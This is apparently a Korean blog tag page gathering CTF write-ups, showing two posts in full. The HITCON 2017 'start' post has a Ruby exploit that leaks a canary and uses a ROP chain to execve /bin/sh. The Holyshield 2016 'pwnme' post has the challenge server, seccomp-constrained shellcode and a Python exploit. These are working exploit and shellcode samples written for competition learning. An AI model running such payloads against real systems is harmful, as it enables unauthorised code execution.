'syscall'에 해당되는 글 4건

  1. 2017.11.22 [HITCON CTF_2017] start(pwnable)
  2. 2016.12.26 [Holyshield CTF_2016] pwnme(pwn)
  3. 2016.12.10 [pwnable.kr] unexploitable(500pt)
  4. 2016.12.02 [pwnable.kr] asm(6pt)
2017. 11. 22. 00:24

## HITCON CTF_2017(start, pwn)


[Summary]

1. python 모듈인 pwntool과 같은 역할을 하는 ruby모듈 pwntool을 사용하는 문제

=> https://github.com/peter50216/pwntools-ruby

2. server.rb가 실행되는데 eval()함수로 루비 코드를 실행시킨다.

3. start 바이너리는 간단한 bof 취약점이 있고, static compile되어 있다.

=> syscall을 이용한 rop를 하면 된다.

4. canary가 있으므로 0x18바이트만큼 덮어 씌우고 출력하면 canary leak 가능.


[Exploit Code]  - start_exploit.rb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# encoding: ASCII-8BIT
# The encoding line is important most time, or you'll get "\u0000" when using "\x00" in code,
# which is NOT what we want when doing pwn...
require 'pwn'
 
context.arch = 'amd64'
#context.log_level = :debug
= Sock.new 'localhost'31337
 
bss = 0x6cdb80
syscall_gadget = 0x468e75
pop_raxrdxrbx = 0x47a6e6
pop_rsi = 0x4017f7
pop_rdi = 0x4005d5
 
canary_leak_payload = 'A'*(0x19)
 
# Stage 1 : canary leak
z.send canary_leak_payload
z.recv 0x18
canary = u64(z.recv 0x8- 0x41
log.info "[+] canary : #{canary.hex}"
 
# Stage 2 : read(0, bss, 8) & execve(bss, 0x0, 0x0) => bss:"/bin/sh"
rop_payload = 'A'*0x18 + p64(canary) + "ebppebpp"
rop_payload += p64(pop_rdi) + p64(0x0+ p64(pop_rsi) + p64(bss)
rop_payload += p64(pop_raxrdxrbx) + p64(0x0+ p64(0x8+ p64(0x0)
rop_payload += p64(syscall_gadget)
 
rop_payload += p64(pop_rdi) + p64(bss)
rop_payload += p64(pop_rsi) + p64(0x0)
rop_payload += p64(pop_raxrdxrbx) + p64(59+ p64(0x0+ p64(0x0)
rop_payload += p64(syscall_gadget)
 
z.send rop_payload
z.send "exit" + "\x0a"
z.send "/bin/sh"+"\x00"
 
# Switch to interactive mode
z.interact
 
cs


'CTF writeup' 카테고리의 다른 글

[34C3 CTF_2017] readme_revenge(pwnable)  (0) 2018.01.22
[34C3 CTF_2017] SimpleGC(pwnable)  (0) 2018.01.07
[CSAW CTF_2017] prophecy(reversing)  (0) 2017.09.21
[HDCON_2017] Fabuary(reversing)  (0) 2017.09.21
[ASIS CTF_2017] mrs. hudson(pwnable)  (0) 2017.09.13
Posted by holinder4S
2016. 12. 26. 19:14

## Holyshield CTF_2016(pwnme,pwn)


[Summary]

1. hex-ray가 안됨.

2. 쉘코드 실행이 가능하지만 seccomp sandbox가 적용되어 read, write, close(?)의 syscall만 허용됨.

3. flag를 open한 후 동적할당 받은 영역에 랜덤한 offset값(rand()함수를 이용)을 더한 후 그 곳에 저장.

4. write syscall을 이용하여 해당 flag가 박혀있는 주소를 찾아 그 곳의 flag를 출력하는 shellcode를 작성.

5. shellcode의 크기는 0x20이내여야 함.


[Analysis] - (https://drive.google.com/open?id=0B12bAVEUfDg7dmRuMDJsTTJzX3M) 문제 링크

 우선 server가 동작하고 있는 환경에서 server의 9091포트로 접속하면 아래와 같이 shellcode를 입력 받고 

잘못된 쉘코드를 입력하면 segmentation fault가 뜬다.

[그림 1] pwnme 바이너리 실행


이제 이 바이너리를 분석해보면 우선 shellcode를 실행하기 전 seccomp sandbox를 세팅하는 루틴을

아래 [그림 2]와 같이 확인할 수 있으며 그렇게 중요하진 않다.

[그림 2] seccomp sandbox 룰 추가


그리고 바이너리의 처음부터 살펴보면 signal(alram)을 세팅하여 특정 시간이 지나면 종료되도록 되어 있고, server.py를 보면 알수 있는데

쉘코드가 저장되어 있는 파일을 오픈하여 fgets()로 읽은 다음 메모리에 저장한다.(후에 이 쉘코드가 실행됨)

그런 다음 srand(time(NULL))을 이용하여 random seed값을 준 다음 rand함수를 호출하여 아래 [그림 3]과 같이 특정 연산을 수행한다.

[그림 3] flag가 올라갈 메모리 영역의 주소를 랜덤하게 만들기 위한 루틴


물론 이 연산을 파악하는 건 중요하지 않으므로 넘어가도록 하겠다. 이렇게 offset을 랜덤하게 설정한 후 var_4C변수에 저장을 한 다음 

"flag"라는 파일을 open한 다음 fgets()함수를 이용하여 값을 읽어들인 후 아래 [그림 4]와 같이 메모리에 적재 한다.

[그림 4] flag open & read


여기까지 다 끝내고 나면 마지막으로 "call eax"를 하여 shellcode를 실행시키는데 call eax를 실행하기 전 레지스터와 스택 상황을 보면

아래 [그림 5]와 같다.

[그림 5] shellcode 실행 전 스택 & 레지스터 상황


스택의 esp의 값인 0xbffff0f4에서 0x2326 offset만큼 더하면 동적할당 받은 힙 영역의 주소가 저장되어 있으며 이 주소에 앞에서 만든 

random offset값을 더한 곳에 실제 flag가 들어 있었다. 처음에는 random offset값이 스택영역에 저장되어 있을 줄 모르고 브루트 포싱을

이용하여 rand()를 깨보려고 했으나 범위도 크고 출력 server에서 0x6c만큼 read한 값을 주기 때문에 삽질을 많이 했다.

random_offset은 [그림 4]에서 봤듯이 ebp-0x4c에 위치해 있으므로 이 값을 읽어 들여와 malloc()으로 할당받은 힙 주소에 더하는 

쉘코드를 작성하여 write() syscall로 stdout에 출력하기만 하면 되었다.


[server.py]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#!python
import os, sys
from socket import *
import thread
import time
import tempfile
import random
import subprocess
BUFSIZE = 1024
MAXSIZE = 128
HOST = ''
PORT = 9091
RUNNER = './pwnme'
 
def banner():
    fd = open('banner.txt','r')
    buf = fd.read(100000)
    fd.close()
    return buf
 
def TestShellcode(s, sc):
    scsize = len(sc)
    if scsize > MAXSIZE:
        s.send('shellcode is too long...%s' % (MAXSIZE))
        s.close()
        return -1
    return sc
 
def handler(s, addr):
    s.send(banner())
    TIMEOUT = 10
    while True:
        s.send('please input shellcode\n')
        rv = s.recv(MAXSIZE)
        r = TestShellcode(s, rv)
        #print printHex(r)
        if r == -1:
            return
        else:
            #print printHex(r)
            s.send('Okay I\'m execve shellcode...\n')
            fn = tempfile.mktemp()
            open(fn, 'wb').write(r)
            child_pid = os.fork()
            if child_pid == 0:
                cmd = [RUNNER,fn,str(TIMEOUT)]
                fd_popen = subprocess.Popen(cmd, stdout=subprocess.PIPE).stdout
                data = fd_popen.read().strip()
                  fd_popen.close()
                if data == '':
                    s.send("segmentaion fault\n")
                    print "================client================"
                    print "segmentaion fault"
                    print "======================================"
                else:
                    s.send(data[0:60])
                    print "================client================"
                    print data[0:60]
                    print "======================================"
            else:
                pid, status = os.waitpid(child_pid, 0)
                s.close()
                os.unlink(fn)
                print "%s:%s client has been closed with pid(%05d)-%08x" % (addr[0],addr[1], pid, status)
                return
        return
 
def printHex(xhex):
    xtmp = ''
    xhex = xhex.encode('hex')
    for x in range(0len(xhex), 2):
        xtmp += '\\x' + xhex[x:x+2]
    return xtmp
 
if __name__ == '__main__':
    ADDR = (HOST, PORT)
    svr_sock = socket(AF_INET, SOCK_STREAM) 
    svr_sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    svr_sock.bind( ADDR )
    svr_sock.listen(10)
    while True:
        print 'Waiting for connection on port: %s' % (PORT)
        cli_sock, cli_addr = svr_sock.accept()
        print 'connected from %s:%s' % ( cli_addr[0], cli_addr[1] )
        thread.start_new_thread(handler, (cli_sock, cli_addr))
 
cs


[shellcode]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Disassembly
Raw Hex (zero bytes in bold):
 
31C0B3018B0C2481C1262300008B09034DB4B26CB004CD80   
 
String Literal:
 
"\x31\xC0\xB3\x01\x8B\x0C\x24\x81\xC1\x26\x23\x00\x00\x8B\x09\x03\x4D\xB4\xB2\x6C\xB0\x04\xCD\x80"
 
Array Literal:
 
{ 0x31, 0xC0, 0xB3, 0x01, 0x8B, 0x0C, 0x24, 0x81, 0xC1, 0x26, 0x23, 0x00, 0x00, 0x8B, 0x09, 0x03, 0x4D, 0xB4, 0xB2, 0x6C, 0xB0, 0x04, 0xCD, 0x80 }
 
Disassembly:
0:  31 c0                   xor    eax,eax
2:  b3 01                   mov    bl,0x1
4:  8b 0c 24                mov    ecx,DWORD PTR [esp]
7:  81 c1 26 23 00 00       add    ecx,0x2326
d:  8b 09                   mov    ecx,DWORD PTR [ecx]
f:  03 4d b4                add    ecx,DWORD PTR [ebp-0x4c]
12: b2 6c                   mov    dl,0x6c
14: b0 04                   mov    al,0x4
16: cd 80                   int    0x80
 
# ref) https://defuse.ca/online-x86-assembler.htm 
cs


[Exploit Code] - pwnme_exploiyt.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
import hexdump
 
context(arch='i386',os='linux')
local=False
#local=True
 
if local:
    p = remote("127.0.0.1"9091)
else:
    p = remote("1.224.175.27"10030)
 
#binary = ELF("./pwnme")
 
raw_input()
 
#payload1 = "\xBB\x01\x00\x00\x00\x89\xE1\xBA\x3C\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80"
#payload2 = "\xBB\x01\x00\x00\x00\x83\xC4\x3C\x89\xE1\xBA\x3C\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80"
#payload3 = "\xBB\x01\x00\x00\x00\x8B\x0C\x24\x81\xC1\x26\x23\x00\x00\xBA\x3C\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80"
#payload4 = "\xBB\x01\x00\x00\x00\x8B\x0C\x24\x81\xC1\x26\x23\x00\x00\x8B\x09\xBA\x3C\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80"
#payload5 = "\x31\xDB\x43\x8B\x0C\x24\x81\xC1\x26\x23\x00\x00\x8B\x09\x81\xC1\x31\xAA\x01\x00\xBA\x3C\x00\x00\x00\xB8\x04\x00\x00\x00\xCD\x80"
payload6 = "\x31\xC0\xB3\x01\x8B\x0C\x24\x81\xC1\x26\x23\x00\x00\x8B\x09\x03\x4D\xB4\xB2\x6C\xB0\x04\xCD\x80"
 
print p.recv(1024)
print p.send(payload6+'\n')
print p.recv(1024)
print hexdump.hexdump(p.recv(1024))
cs


[Get Flag~~!!!!]

끝~!

'CTF writeup' 카테고리의 다른 글

[BoB CTF_2016] megabox(pwn)  (2) 2017.01.10
[Christmas CTF_2016] StupidRSA(misc)  (0) 2016.12.26
[Christmas CTF_2016] NMS(misc)  (0) 2016.12.26
[RC3 CTF_2016] IMS-hard(pwn)  (2) 2016.11.25
[RC3 CTF_2016] IMS-easy(pwn)  (0) 2016.11.25
Posted by holinder4S
2016. 12. 10. 07:02

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

2016. 12. 2. 04:11

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.